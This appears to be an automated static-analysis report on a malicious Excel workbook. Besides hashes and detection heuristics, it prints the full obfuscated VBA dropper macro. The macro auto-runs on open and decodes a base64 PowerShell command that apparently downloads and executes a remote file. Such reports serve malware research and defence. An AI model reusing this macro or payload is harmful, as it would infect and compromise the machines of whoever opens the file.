Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b8548a2a9270b78a…

MALICIOUS

Office (OOXML)

Size: 30.8 KB
Created: 2018-02-06 02:47:44 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2021-02-23
MD5: 449986069fa050dc1580db6f5ba1dfca
SHA-1: 4af90a7cac0a842e1d962c592c100f372d45e8a3
SHA-256: b8548a2a9270b78ace6511b425b62dc1315ca82412622b6f244017651e196955
Risk Score: 290

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6442671-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6442671-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ujJoUYppBnLKtVHRtxixsYzhpaFc(Urarx), MUtvfDszfbYaZLEjhyyOubCftNfWjbzuSMcguPfpdHlSYHXgTQzqcrilSOBRYWQDbeHNiYpRTIkmqjGmqyCTcJSberO
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
     Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub workbook_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 17414 bytes
SHA-256: b5bd099494eae0ac462153091a9f55c759c1a97cac54bf6b71143c65e53a6402
Detection
ClamAV: No threats found
Obfuscation or payload: likely
170 of 205 identifiers look randomly generated (e.g. 'yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhd') — consistent with name-mangling obfuscation. Carved artifact contains 5 long base64-like blob(s).
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()


UqmK.cVQOFprcPFwMmqjsixzl
Dim VsKsfPXcShbqXrMZLtiVCbttbUroaAvJBncjLXiqRPKheFovdKhp As Integer
If 57 = 32 Then
Dim OeitzQQLYjBRlRokOcOnKsDnRLOVfwKPTG As Date
Dim uXEjkuHWSiNswNREgAwteWavcnBugbYmyfWQffsTgoaVZYPBEbPJSZbYxJG As String
End If
Dim wsMqqJbuQqAYBIdNqvEVDYzqEMOTYDxTWYvbUxkLy As Integer
If 50 = 47 Then
Dim eyLEDNBpMlcsnDYsWldvHWNsgCcMBtsLtXZaolByNdLRVbi As Date
Dim UXixMGQqHkSYAkonTsRzQexEkjfheLvXFTIpTvgFcgRpWN As String
End If
Dim ANZprYDcRqZeNcbiMwpuTgcyUYMLWkNIiXiRIoTWTc As Integer
If 46 = 53 Then
Dim CRPpiDdtUUzbtTkaVTMsFhdQvptKaXdSbqeKjeqJi As Date
Dim dPsJHdOghSAKbXUoytsJTSwrhzDparrcCKcRkHoLedtFdH As String
End If
Dim zSJWklxzOKSBbHZZGqbXIRvCDqEgfqZrOaAlfEGGeDvSyjghlFXDdFziX As Integer
If 57 = 49 Then
Dim GSugRUYkbnBGotCjVsFVdDUKWuZSVNIaSN As Date
Dim YlMZNiXhXweaxLVTINuMuCyjJWuFPNeaobVQXveWywgXf As String
End If
Dim vxOxCFugGTVncQrnRSJSEmVqFwMiXNxWaENYgIMIjuiHzcu As Integer
If 42 = 37 Then
Dim fniheWFbJbYrGsMIsVzM As Date
Dim YCSHIFBiJDOrcBhvpgTzVdDwHRGPXmqlzPWcUaYYV As String
End If


Dim XRGNhOFKQTLCArvyWzrzlKXNcrNfEbOIvdyLxjaCBEGSej As Integer
If 39 = 43 Then
Dim zXadybgZkMtskpBZFpEDHWtjBmZpygEEj As Date
Dim tspEbdnbVtmRFykAbzROacceqcLBrbDHoJrwMVeMRc As String
End If
Dim lcGRvnopWhmqJQQKNyRlkuqecwHooGUEwyrzXY As Integer
If 51 = 58 Then
Dim hXNCEWUyzagBHgu As Date
Dim grqmcozgABQNitLZQmoRtXipUJewgHmynK As String
End If
Dim QGANvjhqNBnImEoBQPSPBIJBSTKDAsOS As Integer
If 32 = 51 Then
Dim ZYdEZCrEjCKhCLWZHfqXfXIIwyucZeqUmViObjb As Date
Dim NYNgyyczHwkvVCrmCPUIaIOfFMpvgcHxXDdyRrKKUznfoiV As String
End If
Dim SuigzGbAFJialIhSeonXRZsUKEKoaUjrXrXAx As Integer
If 43 = 34 Then
Dim vIqwDXpjRZBmhIrBKEtBNVvwnalZqDukgUjgwbOBClt As Date
Dim eJBtLspMmezkZMuJcmPsNeRGMZKFjqrycbQnlgZhBqHGhkJTBSlPns As String
End If
Dim gAsvglhkdwnAHywHXwMirXWKYbQrDRFbLjvQvpAnAQN As Integer
If 46 = 46 Then
Dim LTgdLXtuoDEBIdhWEVqhMrLpXCgMiwYhbKLrsyETJWQYGimmNTvS As Date
Dim KiAUHqFJqhMseXZyRpeFQWXpbmioPtyOAGXsJrjBtvccKX As String
End If


End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UqmK"
Dim AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa As String
Dim evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb As String
Sub cVQOFprcPFwMmqjsixzl()

 On Error Resume Next
Dim eSGCqpoYXcKtALsTkrxENLVaIIrIQvoAPtkttHsLjjdK As Integer
If 55 = 35 Then
Dim zstekkvneOlSxfthygH As Date
Dim bnKeHbyZdylVdhKbPPNXgAAWBHRvONKNCbBXpOmCmKRpssHknEeSkIa As String
End If
Dim bmnczJCLPoXSBfnlBdKlWiLdIzgIKjrcuAalCm As Integer
If 34 = 38 Then
Dim mtjzCAVaFFASdpaWEsaJUAcuAgwvYAFBiOqRCWgLIit As Date
Dim bIrGCCXwhLsSmQpyVEZCFzyjOzIUiMOAlGBlJZu As String
End If


 
Dim sAEXqqwEBMYKHigobKHsDtDOVwrgfODpwKhBAcHtRvHHJBHSFSZbBhqywq As Integer
If 30 = 52 Then
Dim CuyQYmIjOwBeozCNbImwEToZaNpcnOTiEJZNvAWVya As Date
Dim nLQbdZYoGiMAmiFYpKwgvzdSZeapSalRxdgdJzjQDzIkWEXrHXKMYRe As String
End If
Dim nhxBzzjVgxvCJBcOqagcwqswVHihvPZsfysvLxk As Integer
If 55 = 47 Then
Dim QTdcnaBNpeIUlsoixpAgrQBaQYDWKJgDtpPJTOEWTtsCmvnArQvG As Date
Dim KRtzSCLPXeCgyEbvcfOjkeMxXynVkCfuOasbwPqQCpypqMEhUrXLBLVgE As String
End If

 bHkRfRbcBnpvdvZLEhgMKzufkERzpAAVdREtWbOUXtgJpdVsScpZrWKcMFgaAb
Dim vcTPqeUyIRXMzzNoyhufXHLuFBsfUtCEMXAnXBLKeqivgVUsKWDeaAg As Integer
If 42 = 33 Then
Dim oQZJompeOPTzbyZRwVkBhYQNkgzVypXdMqMWysXYoLTfNW As Date
Dim tukFGJqyzPALZImUfYrpnllDSEyLMVEkz As String
End If
Dim OnFktiNmNrwVmTPmUgunXiHIhmCLfldLQMKUgjmpdCZup As Integer
If 30 = 37 Then
Dim hfkiZrpJwbffxCGgCHcNlEaIuFltFKVJNSAHRcGtoBUkfojggJbvx As Date
Dim hEcEcoTGvEmGVReCyOZBiYjkqdFWENviZMgOXCp As String
End If

End Sub
Function ujJoUYppBnLKtVHRtxixsYzhpaFc(evwZFvXBHfAongtWeGVZwpvxjqrQQwHmzXFNbhCOgDLLjAMryguaUnao)
Dim omnswheJWFehvCtOIUsOzixCiJEgIlPfv As Integer
If 56 = 52 Then
Dim ZlOufmCLTiQafAggxYtf As Date
Dim opFplKndxAlpylVQeTchpCgzgbCIXALNVzHjfZJV As String
End If
Dim zYOSxbbuePBdvMqlJFIJHeFxpYTyemkFKHiQoNCFAIeIyhRJJVZ As Integer
If 57 = 39 Then
Dim aQAOUSQcYHcQsevTndZxvCDIyAxy As Date
Dim IGJpIMKoJsNxYldxXsleCNdgjYeXMrPTVRTSynHfUHKvPcZJYGlGPTv As String
End If
 Dim iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS
Dim vcdFkimcRducGSLzjkFKvDiQHzUyGGJEBWYpUiXxhesSVASrNHBVJJzstN As Integer
If 30 = 30 Then
Dim xkNnWLTpakuVeBNIcRKQuHgclyEousWgwHkmjtIgyga As Date
Dim ixrcAHBgihcTqElCXHeuhNOZXQaYjIeRN As String
End If
Dim gxetVDgtLnyTntiyrkZTlsVjSFjhdxaDLFJGGIBExB As Integer
If 39 = 49 Then
Dim VaPGjWrasYFxcocvbQTzQONvIikcri As Date
Dim iUWkXuUMVNpCFCyNcVeLhlkykGNUxBmPiJpkbsQibOvGKNJLwuFOygBxkYz As String
End If
   AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa = "MS" & "XM" & "L2." & "DOMDocument"
Dim QhzOUaZUvNOlkEvjSqdnXxCXCvXRBIrzDsAAbAagltN As Integer
If 33 = 52 Then
Dim yiJUKCwiHGkcTecLZDHSnVOhsDvISPxCejEotaNPFZjtTQhWyoBdd As Date
Dim aacUbcGHnQsIiyjaoSyqsNNlUObWYJdOUYDJbTRyGIRJrkk As String
End If
Dim SxvKVDnlNMqzNAjidmeoJuayUBAjjvE As Integer
If 51 = 45 Then
Dim ukdJZdzHLhnpwlU As Date
Dim DxWanWNwbXWwqUDDBSIvPkqKEeeSGVFeNzxCMJI As String
End If
 
Dim hgnCmCgInHemXopETGLVIsuqFSsjqXAqsKaPbh As Integer
If 56 = 43 Then
Dim EIXVrKcjipXudvBnzpmxwUJxSPHn As Date
Dim tMOadlCCxnAjNVjCLvtFpELkcekkzaDbDopV As String
End If
Dim bxRrtyqLoCjbkGlWVBypBdxzBRDWjZf As Integer
If 37 = 48 Then
Dim YfOaOeCMrOzwZuJAspgGCqATyzS As Date
Dim qbuTbPXKvVfWsToGbChXErQKhDTdifucP As String
End If

  
Dim LLkwvXgCjNeNSomNjZRQbNzKklYwtcQbDHgHDKgeAU As Integer
If 46 = 38 Then
Dim UdmxPPgPyGcLoyMaLJzkJHxDJLHfKZsmQGsVYmWJPeeKyrSiudzWfQLNgin As Date
Dim DHBFZNqvhFrBZnpUecmESsZkgaWHAuepqzSBOZFxIwlcDcajpvhktdVLiRY As String
End If
Dim zriunbBLZVoFEXpwWHxgEAmREMtwMeGTxBFGZBxABRAOApcNDhyEkkU As Integer
If 42 = 44 Then
Dim zERqahFyvOVIDRjXUJwemzYQOjgsffCiMgGBHKXTw As Date
Dim SEzfhZvTJeuoGhzfAbqANTQLnvXLhPJmdiTvZlgKlZVBItGyHW As String
End If
 Set iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS = CreateObject(AyqODGkLXOpPaguxEGttejNjezSjBgSMwRMcqnKZSAoVKxRSmxWNthKRlHkEoAJrwdSJTRGRwTa)
Dim HjgSizoormCkluUILYOEGPufOnyPDupYDLIa As Integer
If 40 = 57 Then
Dim GKzUHktuIBnbgzihkDQroAEvBYkxwdgaltCBYtwVVAXMAXiDLHoAuR As Date
Dim mFFETiAvxfVNpmxgJqGvVodrudpglppfgUHwvUaOUaCrrmhvFfyxuyvx As String
End If
Dim cOJpsTKIqphUfBlpQrbvmlzHwtbGqrlhZJUhKkVBPtBCFNQEtJhCXALqOBt As Integer
If 34 = 56 Then
Dim zsDRyDzvVgEefWZfsjxCidWNhJjJYydSIrWIMbD As Date
Dim yFRvXpeBfxUTHRzKVVqkoTqWXDlVoAQTRgzwQi As String
End If


  Dim yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX
Dim zXCIELEfWBJgAnWrOePvXUDJNfhBBb As Integer
If 42 = 39 Then
Dim RDtnWShgPeSsgkMHzdxaRUgVKeTtuZeCdvjFnNRDJhOkcfnSwGfDEbJxWYc As Date
Dim rznmqAQOlBGUmLtQkFvsfqAwntaxBmmiOkZEVvYkMQCRpmt As String
End If
Dim rKKYrbfxAyrzxZSNzOYFBmpvphLgOojH As Integer
If 47 = 50 Then
Dim AAinqNvHjnYGevbKuDCCRhrFUPjJPziMO As Date
Dim kywqfWlTRWONjQtGAmLlgpTJdSadmsk As String
End If
  Set yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX = iHOiHJiuIfzPGQNWbRZjXJDRnskdpsAOTExqfZMVPmkHFZCBntvqS.createElement("ZyAAjwNlQhWbFau")
Dim EMruxeTOgRjALdskyqCOMXaiuenNMvHhYlJ As Integer
If 50 = 40 Then
Dim AsWvchXfUxpIfkhcnjdXhmJA As Date
Dim SrGBkJBbZUrscuZhprFkEWHcfTUxvObOjWdlaVuLvOiLto As String
End If
Dim AtJwipgYvvjdWQpEfLsdJFQoGTxupqnwjqTanzglhKbhBxzdVriXTPfu As Integer
If 55 = 52 Then
Dim cVpOsmjFIntfxOQgfGwyejnJUTYxHPdULZxSKRsubWZODTgHaBsMShQ As Date
Dim thgtZNlxsKZUYQyWNOBXIJZFBnRXGWRBdIEkdXThpYgDeyIqbffy As String
End If
  evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb = Chr(268 - 170) & Chr(182 - 77) & Chr(460 - 350) & Chr(311 - 265) & Chr(463 - 365) & Chr(118 - 21) & Chr(295 - 180) & Chr(369 - 268) & Chr(81 - 27) & Chr(107 - 55)
Dim RJHjIasmwNrVtXqPMNspuUhjdVaCebvarSkUAVcDfhlchLKHH As Integer
If 36 = 57 Then
Dim sdNmpDwcYGmApHURQeamWOrlpJMjF As Date
Dim BSLTvlxhoBPnrcPpDqaQKRgkUlemcxfr As String
End If
Dim NXXnbguVXkccLzfmcwmTmSvjlayKHKFqVYZUEbNWwFsapEZVFsKgKMEub As Integer
If 59 = 47 Then
Dim nCBikNMelGmZKhBiQWgaVugBdEOAZfJTe As Date
Dim sRYMnMrgvDymvvLJxupYUGtWzEfzMFFwTuSQ As String
End If
  yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.DataType = evsYhiAxEKESPHvrjDFlRqwZheHyUrERaHfVtjCWoDFgrLDBYaWNqiJnySqDaBcNFnrIb
Dim cWcKpuZqiPhIDrclTvKlXCMigsTqyBSBcvgaSeiahCojXWwVdUdYkgsaK As Integer
If 40 = 32 Then
Dim texajsgxggHKBToMjEVOcLJwyNeYtQwDGQYAlAxKHmrqoKbAoMBbXLhiUAb As Date
Dim WNIDPjEDluoajHKHqUSHnmdjhPUgujqfk As String
End If
Dim YbwyjbHjHpGAlRUMEqNCtojkYVAOYJ As Integer
If 37 = 38 Then
Dim CEIpKfNIGsLYgwXjvxATpscdrjrMaNbtL As Date
Dim ynCrvHpzwkVrVInMoaCOFTKbfybnAhtRRMiJVszqLUtIHmWbEAlnYfFe As String
End If
  yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.Text = evwZFvXBHfAongtWeGVZwpvxjqrQQwHmzXFNbhCOgDLLjAMryguaUnao
Dim daMxfByOqDZIaerwaMCkaBTsczjAwGsmGDgufC As Integer
If 51 = 32 Then
Dim KJVeRDMOBaIpMMcVEbGTVgRySkKmBWywQXBsPwj As Date
Dim QfNyJrGtgKlyEnLhesXLhsaNebMYpKjFIrqoHiIGMqebP As String
End If
Dim XtIEpXArkCXFAThfiDVafqNxXZvjQzqOyyGiDUzmjOXpTi As Integer
If 59 = 50 Then
Dim HOabenIAjhgLgQcQalLJGCMzcNEjr As Date
Dim RSYeoSgIpUDFxOZBrnjKSnldKcECby As String
End If
  ujJoUYppBnLKtVHRtxixsYzhpaFc = yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhdywKhUcUdAiQCtlOedAImhYqPJTVpcLvkJXGHJDESrkpzYsCYhpMX.NodeTypedValue
Dim QiZJROIhrxvHlRIDInnykaUYZehuUMNehq As Integer
If 41 = 59 Then
Dim EUgoxKsKvmPKCUUGUROdOpNAjnhNNfjQauMnWTqdFafiJPcMZN As Date
Dim swPEcPGgFKcfxQCykHIhkAblYoKfrTKUnznmBVRxgqNfAZcPf As String
End If
Dim LfUEsdrVdgoEbolzHrxcQwOqLAtnvlyLvzgoqQvWwRXodsFBbgsie As Integer
If 44 = 59 Then
Dim mPOQetrkEasicJbIxJrvbgyZZMTvrLOsPgJkRXLXDmrreGBidseXBmD As Date
Dim FQprSawstLASvArrZxUspoHuTLkRygrqddDTcgtwGtyfenFhlB As String
End If

End Function

Sub bHkRfRbcBnpvdvZLEhgMKzufkERzpAAVdREtWbOUXtgJpdVsScpZrWKcMFgaAb()
MUtvfDszfbYaZLEjhyyOubCftNfWjbzuSMcguPfpdHlSYHXgTQzqcrilSOBRYWQDbeHNiYpRTIkmqjGmqyCTcJSberO = 0
Dim EZhuNQJuYHpetMTJpRxYOtDXlvqbPfFCf As Integer
If 59 = 38 Then
Dim wcSJjQmJhImHcAmMUynkNnKV As Date
Dim JIRaiesBmzwkBzGBKPglRQJvDPvgRSSJR As String
End If
Dim wAayLbCPlUdDBKUrmayHZEtzWWSjMjUgnTFzgDyndVgvgsCEaofrUC As Integer
If 47 = 41 Then
Dim rsGbboITDBAwQiFVLib As Date
Dim KdDXyTeUNJXEcMkbMsFbJeKSfvjbTzEdxQJYnUIHxTvJf As String
End If

Urarx = Urarx & "QwBtAEQAIAAmACAALwBDACAAQwBEACAAQwA6ACAAJgAgAFAATwBXAGUAUgBzAGgARQBsAGwAIAAtAGUAbgBDAG8AZABlAGQAQwBPAE0AbQBhAE4AZAAgAFoAZwBCADEAQQBHADQAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMAQQBBAFUAUQBCAHoAQQBFAHcAQQBjAEEAQgBCAEEARQBRAEEAWQB3AEIAYQBBAEYAbwBBAFQAZwBCAEYAQQBGAEkAQQBiAGcAQgA0AEEARwBJAEEAUQB3AEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAG8AQQBUAGcAQgBpAEEARgBvAEEAYQBRAEIAagBBAEUAVQBBAFEAZwBCAE8AQQBGAFUAQQBXAGcAQgBJAEEARwBrAEEAYgBnAEIARABBAEYAawBBAGMAZwBCAHMAQQBHADQAQQBUAEEAQQBnAEEAQwB3AEEASQBBAEEAawBBAEgAQQBBAFIAdwBCAEwAQQBHADgAQQBUAHcAQgBXAEEASABRAEEAVABRAEIARgBBAEYAZwBBAFoAUQBCAGwAQQBHAFkAQQBZAFEAQgA2AEEASABJAEEAWgBRAEIAdQBBAEcATQBBAGIAdwBCAHYAQQBDAEEAQQBLAFEAQgA3AEEAQwBnAEEAVABnAEIAbABBAEgAYwBBAEwAUQBCAFAAQQBHAEkAQQB"
Dim wXkfHscGGRfTlsCjCBOEuHMCLnskxepjAmiXywLHcWqydFCcF As Integer
If 47 = 40 Then
Dim YuSgElpLiTTzsJc As Date
Dim bwSyJfkGpHcXQNYGkQeYjXCwBtMQcsHjNOXhnESanocZ As String
End If
Dim bNZxKNijOksEtVxQSUexztKBqqSgyDlvucUnTOFPJXVcWToRHBHSKfZiD As Integer
If 34 = 40 Then
Dim XHTuClKyxJQBJwEOPocXifXCBZwwSlPDljwHmUHmLdYKXQxEDEv As Date
Dim rxKVsjRtcoOgMtNPZAwcugqMEGNflcrsOqYFbOEXUbexw As String
End If
Urarx = Urarx & "hAGcAQgBsAEEARwBNAEEAZABBAEEAZwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwA0AEEAVABnAEIAbABBAEgAUQBBAEwAZwBCAFgAQQBHAFUAQQBZAGcAQgBEAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAHAAQQBDADQAQQBSAEEAQgB2AEEASABjAEEAYgBnAEIAcwBBAEcAOABBAFkAUQBCAGsAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEASwBBAEEAZwBBAEMAUQBBAGUAZwBCAE8AQQBHAEkAQQBXAGcAQgBwAEEARwBNAEEAUgBRAEIAQwBBAEUANABBAFYAUQBCAGEAQQBFAGcAQQBhAFEAQgB1AEEARQBNAEEAVwBRAEIAeQBBAEcAdwBBAGIAZwBCAE0AQQBDAEEAQQBMAEEAQQBnAEEAQwBRAEEAYwBBAEIASABBAEUAcwBBAGIAdwBCAFAAQQBGAFkAQQBkAEEAQgBOAEEARQBVAEEAVwBBAEIAbABBAEcAVQBBAFoAZwBCAGgAQQBIAG8AQQBjAGcAQgBsAEEARwA0AEEAWQB3AEIAdgBBAEcAOABBAEkAQQBBAHAAQQBEAHMAQQBLAEEAQgBPAEEARwBVAEEAZAB3AEEAdABBAEUAOABBAFkAZwBCAHEAQQBHAFUAQQBZAHcAQgAwAE"
Dim xMQJAXEHbAKHxQlWmIzxVRWUHoLwZHTCtPGuwVkFnlmpOydySBiSeAbfp As Integer
If 38 = 37 Then
Dim wCMLHiUhHNiJqZRXuJkfgFILNdXZAXtob As Date
Dim FASYtfDSIHkvocbRukqqAIqtAyeKvgkU As String
End If
Dim tilZyzAdhNYyXQYAwHGnCxbwJZXuBtXcXQBFrBTvjMJmks As Integer
If 40 = 38 Then
Dim VkadNnawRvHoQYbFbnqwbHOSJvoKDp As Date
Dim noMREmUYgjCayFyCluTdkWwnQNVHTRyPtcIScyU As String
End If
Urarx = Urarx & "EAQwBBAEEATABRAEIAagBBAEcAOABBAGIAUQBBAGcAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEEAdQBBAEUARQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBqAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHAAQQBDADQAQQBVAHcAQgBvAEEARwBVAEEAYgBBAEIAcwBBAEUAVQBBAGUAQQBCAGwAQQBHAE0AQQBkAFEAQgAwAEEARwBVAEEASwBBAEEAZwBBAEMAUQBBAGMAQQBCAEgAQQBFAHMAQQBiAHcAQgBQAEEARgBZAEEAZABBAEIATgBBAEUAVQBBAFcAQQBCAGwAQQBHAFUAQQBaAGcAQgBoAEEASABvAEEAYwBnAEIAbABBAEcANABBAFkAdwBCAHYAQQBHADgAQQBJAEEAQQBwAEEARABzAEEASQBBAEIAOQBBAEEAMABBAEMAZwBCADAAQQBIAEkAQQBlAFEAQgA3AEEAQQAwAEEAQwBnAEIAcgBBAEcAawBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgB3AEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBHADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEIARgBBAEYAZwBBAFEAdwBCAEYAQQBFAHcAQQBPAHcAQQBnAEEAQQAwAEEAQ"
Dim olDHGuBIJUGJtrZERsYAqRNEOlmhWxgamaeshOptPFMnN As Integer
If 38 = 41 Then
Dim IFXTXqaDyeXXytVHUmMngXTMhXDCeklEarFfONzGGWowHVj As Date
Dim UUmvSzzgkmLmzmXZNsSxGnpsGmFhJjWFMoihspSEbKVtDbzUixaDo As String
End If
Dim XcgetpfuRXBPFaLDpgYaNVvSwpenlzLJTQoMBD As Integer
If 43 = 56 Then
Dim yzmKJnUdxBoQsRBcaCgOiEKsJSLswplzBm As Date
Dim hYoDMIySrdzUGuHqqmfnUuptArbchIPoOFjcoXpXQQMhtpLRkG As String
End If
Urarx = Urarx & "wBnAEEAawBBAEgATQBBAFcAQQBCAGgAQQBIAE0AQQBlAGcAQgAzAEEARwAwAEEAWQBnAEIAegBBAEcARQBBAFIAUQBCAFUAQQBIAFkAQQBZAFEAQgA1AEEARwBNAEEAVgBnAEIATgBBAEUAZwBBAGIAQQBCADIAQQBFAEkAQQBhAEEAQgBzAEEARgBVAEEAUABRAEEAawBBAEcAVQBBAGIAZwBCADIAQQBEAG8AQQBWAFEAQgBUAEEARQBVAEEAVQBnAEIAUQBBAEYASQBBAFQAdwBCAEcAQQBFAGsAQQBUAEEAQgBGAEEAQwBzAEEASgB3AEIAYwBBAEcAdwBBAFcAQQBCADEAQQBFAGcAQQBSAGcAQgBsAEEARwBrAEEAYwBBAEIAVgBBAEUAOABBAFEAdwBCADIAQQBGAGMAQQBaAEEAQgBoAEEARgBFAEEAZQBBAEIAdwBBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQA3AEEAQQAwAEEAQwBnAEIAUgBBAEgATQBBAFQAQQBCAHcAQQBFAEUAQQBSAEEAQgBqAEEARgBvAEEAVwBnAEIATwBBAEUAVQBBAFUAZwBCAHUAQQBIAGcAQQBZAGcAQgBEAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBIAE0AQQBPAGcAQQB2AEEAQwA4AEEAWQB3AEIAcwBB"
Dim yzTOSmjuCVhVkjNKGAKeBSwIWDhHALfJraJQUznwtuUUpufdTiiLGGFgDLs As Integer
If 48 = 47 Then
Dim PFctrpXeKZxpGNNlGxbSbXEnRcUCkVdMJHYrRBdfSQVDWscxtVy As Date
Dim ictQrAobOVUtowkgzpVUFUwALBBRZAWJPXvkQqgrc As String
End If
Dim ZPJxWhGlLcHXBsNgsFpzXCNyKeRBAQIIergEmCpUufNYOm As Integer
If 30 = 59 Then
Dim OehDXlrsFXBLmsQFlvTzsJMJuqPUE As Date
Dim ropjYPmUwtXQmlICaQwEpuREPuERXJhVWnNiMbOcdkoCwiFYDGTa As String
End If
Urarx = Urarx & "AEMANABBAGIAQQBCADUAQQBDADgAQQBNAFEAQgBQAEEARABJAEEAYwBRAEEAeABBAEUAYwBBAE0AUQBCAG4AQQBEAE0AQQBOAGcAQQB6AEEARgBBAEEATAB3AEIAawBBAEcAOABBAGQAdwBCAHUAQQBHAHcAQQBiAHcAQgBoAEEARwBRAEEATAB3AEIAQwBBAEYAbwBBAFMAQQBCAFEAQQBFAEkAQQBRAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAE0AQQBXAEEAQgBoAEEASABNAEEAZQBnAEIAMwBBAEcAMABBAFkAZwBCAHoAQQBHAEUAQQBSAFEAQgBVAEEASABZAEEAWQBRAEIANQBBAEcATQBBAFYAZwBCAE4AQQBFAGcAQQBiAEEAQgAyAEEARQBJAEEAYQBBAEIAcwBBAEYAVQBBAE8AdwBBAE4AQQBBAG8AQQBEAFEAQQBLAEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQA9AA=="
Dim TQPxWlTdKUwmMBtyXaqzBTaEFPIgogNRqHCGYQLbHkRJoBquo As Integer
If 33 = 34 Then
Dim HAdQUYzpKrHcnpeGewEznaHOOrRCRPD As Date
Dim ZNshgkBWiDQNYEyUvnCJFluBgsPBdGxYuohPuIxWdZVwWNiKQWWO As String
End If
Dim OGxoTqAnUAtcFsSkWjanpgggPxfTJFkGkiKoqtvDHKBcgtqduynhwj As Integer
If 52 = 55 Then
Dim YiZRYVLhdPQmrXieudnW As Date
Dim ffeEAVHBZLRDKBKbPYUasZglMtCTvQEKtZDsDVRDOKISxM As String
End If
 
